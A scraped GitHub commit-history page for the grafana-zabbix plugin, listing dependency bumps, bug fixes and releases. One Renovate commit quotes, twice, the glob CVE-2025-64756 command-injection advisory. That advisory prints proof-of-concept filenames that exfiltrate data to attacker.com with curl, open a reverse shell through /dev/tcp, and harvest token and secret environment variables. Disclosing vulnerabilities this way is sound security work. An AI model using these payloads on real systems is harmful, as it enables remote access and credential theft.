href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1430">grafana/grafana-plugin-sdk-go#1430</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.2 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1431">grafana/grafana-plugin-sdk-go#1431</a></li> <li>Add debug logs to highlight provider behaviour by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1432">grafana/grafana-plugin-sdk-go#1432</a></li> <li>Context-aware instance manager by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1352">grafana/grafana-plugin-sdk-go#1352</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0</a></p> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.281.0 -version v0.282.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>(*GrafanaCfg).Diff: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/instancemgmt</h1> <h2>compatible changes</h2> <p>NewInstanceManagerWrapper: added NewTTLInstanceManager: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/experimental/featuretoggles</h1> <h2>compatible changes</h2> <p>TTLInstanceManager: added</p> <h1>summary</h1> <p>v0.282.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
5790b9a68d |
chore(deps): update dependency glob to v11 [security] (#2122)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[
|
||
|
Jocelyn Collado-Kuri
|
86b7328f39 |
Variables: Allow fetching disabled items for Item type variable (#2109)
This PR adds support for showing disabled items when using the `Item` type template variable. Similar to how we support disabled items today in our query editor: <img width="435" height="254" alt="Screenshot 2025-10-21 at 9 00 11 AM" src="https://github.com/user-attachments/assets/832537c8-84c3-45fe-a85d-b16c8e15f759" /> In this example, the host contains a disabled item `CPU iowait time` <img width="1763" height="46" alt="Screenshot 2025-10-21 at 9 02 08 AM" src="https://github.com/user-attachments/assets/85419e88-280d-4dce-baee-bf403e1de05d" /> Which we can now show and hide from the variable in Grafana: https://github.com/user-attachments/assets/eca9327e-40a6-4852-92e9-71ff1ad9ea32 I also removed some deprecated types and packages :)! Fixes: #2025 --------- Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> |
||
|
Jocelyn Collado-Kuri
|
045c708c69 |
Fix: ensure that applicationids parameter only gets passed when the datasource supports it. (#2110)
Zabbix 5.0.x supported filtering `Problems` feature with `applications`.
When this got removed, we removed the filter dropdown from the UI, but
failed to check whether applications were supported before sending out
the request with the parameters.
This was causing dashboards that had been created with zabbix version
`5.0.x` to fail when querying with newer versions of our plugin with
error: `Invalid params. Invalid parameter "/": unexpected parameter
"applicationids".`
These changes now ensure that we also check whether applications filter
should be supported before sending the backend request to fetch
problems.
How to test:
- use the attached JSON file. This was created using zabbix50 and
applying an `applicationids` filter for `Problems` query type OR
- run the `zabbix50` test environment:
```
cd devenv/zabbix50
docker-compose up -d
```
- create a dashboard that queries for `Problems` and filters with
applications then export the dashboard JSON
- stop the `zabbix50` test environment and start the `zabbix74` test
environment
```
docker-compose stop
cd ../zabbix74
docker-compose up -d
```
- import the dashboard you created above, it should load and work as
expected.
Bottom panel was created using zabbix50 and it used the application
filter. Both panels now load as expected:
<img width="2558" height="1018" alt="Screenshot 2025-10-21 at 2 28
25 PM"
src="https://github.com/user-attachments/assets/9613d59b-3f88-420c-9897-f8d988b3d2f0"
/>
Fixes https://github.com/grafana/grafana-zabbix/issues/1852
|
||
|
dependabot[bot]
|
2d9714a4db |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.279.0 to 0.281.0 (#2114)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.279.0 to 0.281.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.281.0</h2> <h2>What's Changed</h2> <ul> <li>Chore: go.mod upgrades by <a href="https://github.com/ryantxu"><code>@ryantxu</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1413">grafana/grafana-plugin-sdk-go#1413</a></li> <li>Docs: Add frame json schema by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1411">grafana/grafana-plugin-sdk-go#1411</a></li> <li>chore(deps): Update module golang.org/x/oauth2 to v0.32.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1417">grafana/grafana-plugin-sdk-go#1417</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1416">grafana/grafana-plugin-sdk-go#1416</a></li> <li>experimental.DataQuery: add unit test by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1418">grafana/grafana-plugin-sdk-go#1418</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.37.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1421">grafana/grafana-plugin-sdk-go#1421</a></li> <li>experimental: DataQuery: switch from timeRange to _timeRange by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0</a></p> <h2>Compatibility</h2> <p>The way <code>experimental.DataQuery</code> objects get serialised to JSON has slightly changed, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></p> <pre><code>gorelease -base v0.280.0 -version v0.281.0 # summary v0.281.0 is a valid semantic version for this release. </code></pre> <h2>v0.280.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/protobuf to v1.36.8 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1393">grafana/grafana-plugin-sdk-go#1393</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1394">grafana/grafana-plugin-sdk-go#1394</a></li> <li>chore(deps): Update module google.golang.org/grpc to v1.75.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1395">grafana/grafana-plugin-sdk-go#1395</a></li> <li>chore(deps): Update module github.com/grafana/pyroscope-go/godeltaprof to v0.1.9 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1397">grafana/grafana-plugin-sdk-go#1397</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1398">grafana/grafana-plugin-sdk-go#1398</a></li> <li>chore(deps): Update module github.com/apache/arrow-go/v18 to v18.4.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1396">grafana/grafana-plugin-sdk-go#1396</a></li> <li>chore(deps): Update OpenTelemetry packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1387">grafana/grafana-plugin-sdk-go#1387</a></li> <li>chore(deps): Update module github.com/getkin/kin-openapi to v0.133.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1402">grafana/grafana-plugin-sdk-go#1402</a></li> <li>Build: Move build info to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1399">grafana/grafana-plugin-sdk-go#1399</a></li> <li>E2E: Move e2e mage targets to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1404">grafana/grafana-plugin-sdk-go#1404</a></li> <li>Build: Rename build/info to build/buildinfo by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1405">grafana/grafana-plugin-sdk-go#1405</a></li> <li>Chore: Upgade github.com/prometheus/client_golang v1.23.0 => v1.23.2 by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1406">grafana/grafana-plugin-sdk-go#1406</a></li> <li>Feat: add session token support for sigv4 to support auth service by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1410">grafana/grafana-plugin-sdk-go#1410</a></li> </ul> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.279.0 -version v0.280.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>HTTPSettings.SigV4SessionToken: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/httpclient</h1> <h2>compatible changes</h2> <p>SigV4Config.SessionToken: added</p> <p></tr></table> </code></pre></p> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
ismail simsek
|
d4e717c757 | Release v6.0.3 (#2102) | ||
|
ismail simsek
|
a489c588d0 |
Chore: Set grpc limits explicitly (#2101)
Set `MaxReceiveMsgSize` as 32mb and `MaxSendMsgSize` as 100mb |
||
|
Zoltán Bedi
|
1f6ba92d96 | Release 6.0.2 (#2091) | ||
Kristian Bremberg
|
6580bf8f6e |
Refactor regex pattern validation to use timeout-based approach (#2090)
- Remove isPathologicalRegex function and replace with MatchTimeout - Simplify parseFilter by relying on runtime timeout protection - Add comprehensive timeout test for pathological regex patterns - Set 5-second timeout for all compiled regex operations |
||
|
Zoltán Bedi
|
0194360f61 | Release 6.0.1 (#2088) | ||
|
Zoltán Bedi
|
5db35450a2 |
Fix: Remove regex pattern length restriction (#2087)
In this PR I removed the regex pattern length restriction because from multi value variables this length can be easly reached, also if the regex is going to be too long it will be caught in the timeout. Fixes #2086 |
||
|
Zoltán Bedi
|
e559459a96 |
Release 6.0.0 (#2084)
Co-authored-by: Kristian Bremberg <114284895+KristianGrafana@users.noreply.github.com> |
||
HH-Harry
|
b7adcea1fb |
More info about acknowledges from zabbix (#2071)
This PR is trying to add functionality requested in [#2061 More info about acknowledges from zabbix](https://github.com/grafana/grafana-zabbix/issues/2061) ### Key features - already described in [Enhancement request](https://github.com/grafana/grafana-zabbix/issues/2061) ### How It Works - using bitwise AND checks of [**action** field in zabbix event.acknowledges](https://www.zabbix.com/documentation/current/en/manual/api/reference/event/acknowledge) keywords are added at beginning of ack.message field on problem panel in grafana in fllowing order: - (un)acknowledged - (un)supressed - changed severity ### Testing - No testing was done, sorry --------- Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Zoltán Bedi
|
6a1d3b6abe | Add regex safety checks and tests for pathological patterns (#2083) | ||
github-actions[bot]
|
b13d567eee |
chore: bump @grafana/create-plugin configuration to 5.26.4 (#2082)
Bumps [`@grafana/create-plugin`](https://github.com/grafana/plugin-tools/tree/main/packages/create-plugin) configuration from 4.2.1 to 5.26.4. **Notes for reviewer:** This is an auto-generated PR which ran `@grafana/create-plugin update`. Please consult the create-plugin [CHANGELOG.md](https://github.com/grafana/plugin-tools/blob/main/packages/create-plugin/CHANGELOG.md) to understand what may have changed. Please review the changes thoroughly before merging. --------- Co-authored-by: grafana-plugins-platform-bot[bot] <144369747+grafana-plugins-platform-bot[bot]@users.noreply.github.com> Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
Zoltán Bedi
|
e76741b453 | Fix: alias functions in Services query type (#2078) | ||
|
Zoltán Bedi
|
b95859cf52 |
Fix: Functions dropdown positioning (#2073)
Now it uses the position where it have enough space for it. Also removed the input component as it didn't do anything. <img width="2032" height="1167" alt="Screenshot 2025-09-05 at 14 29 00" src="https://github.com/user-attachments/assets/0f75e4c3-ae7d-4200-b76c-e1f781f339ac" /> Fixes #2069 |
||
|
Zoltán Bedi
|
47226b864d | Add create plugin update workflow (#2074) | ||
|
Zoltán Bedi
|
9089067e03 |
Fix: slaid is missing error (#2077)
In order to reproduce this you need to create a Service and an SLO. The bug appears when an SLO is not set. Fixes #1784 |
||
William Fitzjohn
|
c35fc5c41e |
Fix: [#2042] replaceAlias function ordering in the query editor causing buggy ui interactions (#2043)
Resolves #2042 Fixed a bug that caused strange behaviour when adding multiple replaceAlias functions |
||
|
dependabot[bot]
|
27a473d11a |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.278.0 to 0.279.0 (#2075)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.278.0 to 0.279.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.279.0</h2> <h2>What's Changed</h2> <ul> <li>Renovate config. Remove dependabot by <a href="https://github.com/andresmgot"><code>@andresmgot</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1385">grafana/grafana-plugin-sdk-go#1385</a></li> <li>logging: add plugin version to contextual logging by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1391">grafana/grafana-plugin-sdk-go#1391</a></li> <li>Dependency updates: <ul> <li>build(deps): bump go.opentelemetry.io/otel from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1340">grafana/grafana-plugin-sdk-go#1340</a></li> <li>build(deps): bump go.opentelemetry.io/otel/sdk from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1341">grafana/grafana-plugin-sdk-go#1341</a></li> <li>build(deps): bump github.com/urfave/cli from 1.22.16 to 1.22.17 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1344">grafana/grafana-plugin-sdk-go#1344</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/propagators/jaeger from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1343">grafana/grafana-plugin-sdk-go#1343</a></li> <li>build(deps): bump golang.org/x/text from 0.26.0 to 0.27.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1346">grafana/grafana-plugin-sdk-go#1346</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/instrumentation/net/http/httptrace/otelhttptrace from 0.61.0 to 0.62.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1347">grafana/grafana-plugin-sdk-go#1347</a></li> <li>build(deps): bump golang.org/x/net from 0.41.0 to 0.42.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1349">grafana/grafana-plugin-sdk-go#1349</a></li> <li>build(deps): bump go.opentelemetry.io/otel/exporters/otlp/otlptrace from 1.36.0 to 1.37.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1350">grafana/grafana-plugin-sdk-go#1350</a></li> <li>build(deps): bump go.opentelemetry.io/contrib/samplers/jaegerremote from 0.30.0 to 0.31.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1354">grafana/grafana-plugin-sdk-go#1354</a></li> <li>build(deps): bump github.com/apache/arrow-go/v18 from 18.3.0 to 18.4.0 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1355">grafana/grafana-plugin-sdk-go#1355</a></li> <li>fix(deps): update github.com/chromedp/cdproto digest to 08a3db8 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1356">grafana/grafana-plugin-sdk-go#1356</a></li> <li>fix(deps): update golang.org/x/exp digest to 645b1fa by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1357">grafana/grafana-plugin-sdk-go#1357</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to f173205 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1358">grafana/grafana-plugin-sdk-go#1358</a></li> <li>fix(deps): update module github.com/prometheus/client_golang to v1.22.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1360">grafana/grafana-plugin-sdk-go#1360</a></li> <li>fix(deps): update module github.com/prometheus/client_golang to v1.23.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1362">grafana/grafana-plugin-sdk-go#1362</a></li> <li>fix(deps): update module go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc to v1.37.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1365">grafana/grafana-plugin-sdk-go#1365</a></li> <li>build(deps): bump google.golang.org/grpc from 1.73.0 to 1.74.2 by <a href="https://github.com/dependabot"><code>@dependabot</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1366">grafana/grafana-plugin-sdk-go#1366</a></li> <li>fix(deps): update github.com/chromedp/cdproto digest to d308e07 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1368">grafana/grafana-plugin-sdk-go#1368</a></li> <li>fix(deps): update google.golang.org/genproto/googleapis/rpc digest to a7a43d2 by <a 